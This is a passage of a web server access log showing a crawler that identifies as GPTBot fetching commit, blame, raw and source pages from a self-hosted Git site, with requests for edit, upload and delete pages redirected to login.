AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14061] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:16:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:16:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11359] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" +[17/Feb/2026:16:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:16:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11895] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project" [Client 74.7.227.38] [Length 11042] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:16:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 16053] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" +[17/Feb/2026:16:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 23935] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:16:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fbase_library.zip" [Client 74.7.227.38] [Length 23812] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:16:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2fbase_library.zip" [Client 74.7.227.38] [Length 20828] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/base_library.zip" +[17/Feb/2026:16:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fbase_library.zip" [Client 74.7.227.38] [Length 23784] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:16:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fbase_library.zip" [Client 74.7.227.38] [Length 23822] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:16:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fbase_library.zip" [Client 74.7.227.38] [Length 23817] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:16:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11026] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14505] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:33:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:16:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project" +[17/Feb/2026:16:33:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:16:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project" +[17/Feb/2026:16:33:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:16:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project" +[17/Feb/2026:16:33:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:16:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project" [Client 74.7.227.38] [Length 10816] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:16:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 23144] [Gzip 13.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 